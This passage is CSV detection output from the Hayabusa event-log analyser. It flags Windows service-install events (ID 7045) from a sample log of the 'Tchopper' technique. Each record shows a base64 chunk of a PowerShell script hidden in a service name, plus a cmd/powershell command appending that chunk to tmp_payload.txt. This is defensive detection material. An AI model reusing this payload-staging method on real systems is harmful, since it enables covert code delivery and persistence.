Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:19.033 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:20.486 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:20.486 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:20.486 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:22.080 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:22.080 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:22.080 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:23.533 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:23.533 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:23.533 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:24.976 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:24.976 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:24.976 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:26.423 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:26.423 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:26.423 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:27.868 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:27.868 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:27.868 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:29.321 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:29.321 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:29.321 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:30.774 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:30.774 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:30.774 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:32.230 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:32.230 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:32.230 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:33.674 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:33.674 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:33.674 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:35.128 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:35.128 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:35.128 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:36.582 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:36.582 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:36.582 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
